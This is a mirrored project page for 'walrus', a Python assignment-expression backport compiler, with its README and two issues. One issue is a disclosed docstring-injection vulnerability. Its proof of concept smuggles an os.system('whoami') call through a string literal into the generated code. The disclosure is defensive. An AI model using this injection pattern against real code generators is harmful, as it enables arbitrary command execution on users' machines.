Giter VIP home page Giter VIP logo

walrus's Introduction

NB: walrus is currently under reconstruction. It is highly recommended to directly install from the git repo or the pre-release distributions.

walrus

PyPI - Downloads PyPI - Version PyPI - Python Version

GitHub Actions - Status Codecov - Coverage Documentation Status

Write assignment expressions in Python 3.8 flavour, and let walrus worry about back-port issues ๐Ÿบ

โ€ƒ Since PEP 572, Python introduced assignment expressions syntax in version 3.8. For those who wish to use assignment expressions in their code, walrus provides an intelligent, yet imperfect, solution of a backport compiler by replacing assignment expressions syntax with old-fashioned syntax, which guarantees you to always write assignment expressions in Python 3.8 flavour then compile for compatibility later.

Documentation

โ€ƒ See documentation for usage and more details.

Contribution

โ€ƒ Contributions are very welcome, especially fixing bugs and providing test cases. Note that code must remain valid and reasonable.

See Also

walrus's People

Contributors

actions-user avatar gousaiyang avatar jarryshaw avatar pyup-bot avatar

Stargazers

avatar avatar avatar avatar

Watchers

avatar avatar avatar

Forkers

george-kuanli-peng

walrus's Issues

ImportError: cannot import name 'BOOLEAN_STATES'

pip install python-walrus
walrus

Traceback (most recent call last):
File "/i/t/pypy/bin/walrus", line 5, in
from walrus import main
File "/i/t/pypy/site-packages/walrus.py", line 13, in
from bpc_utils import BOOLEAN_STATES, CPU_CNT, LOCALE_ENCODING, UUID4Generator, archive_files, detect_files, mp
ImportError: cannot import name 'BOOLEAN_STATES'

Docstring Injection Vulnerability

Describe the bug
Docstring injection is possible in walrus wrapper functions, rendering invalid code, which could even cause a security vulnerability.

To reproduce
Generate invalid code:

>>> import walrus
>>> code = '(a:="""s""")'
>>> converted_code = walrus.convert(code)
>>> print(converted_code)
a = locals().get('a')

def __walrus_wrapper_a_2800e7d9867b432c9bf27c087a79f93b():
    """Wrapper function for assignment expression `"""s"""`."""
    global a
    a = """s"""
    return a
(__walrus_wrapper_a_2800e7d9867b432c9bf27c087a79f93b())
>>> exec(code)
>>> a
's'
>>> exec(converted_code)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 4
    """Wrapper function for assignment expression `"""s"""`."""
                                                      ^
SyntaxError: invalid syntax

Exploit the security vulnerability:

>>> import walrus
>>> code = '(a:="""\n    __import__(\'os\').system(\'whoami\')#""")'
>>> converted_code = walrus.convert(code)
>>> exec(code)
>>> a
"\n    __import__('os').system('whoami')#"
>>> print(converted_code)
a = locals().get('a')

def __walrus_wrapper_a_cc9aea47bf50406eba8e7b00edf53b22():
    """Wrapper function for assignment expression `"""
    __import__('os').system('whoami')#"""`."""
    global a
    a = """
    __import__('os').system('whoami')#"""
    return a
(__walrus_wrapper_a_cc9aea47bf50406eba8e7b00edf53b22())
>>> exec(converted_code)
(the `whoami` command gets executed)

Expected behavior
Walrus should generate valid code to calculate a, and the command in string a should not be executed (the original code was just an assignment rather than command execution).

Suggested fix
Do not generate this docstring. It will be hard if you try to "escape" all possible expressions.

Related material
See this CTF challenge with similar logic, in which users can use */ to close PHP comments and inject arbitrary code.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.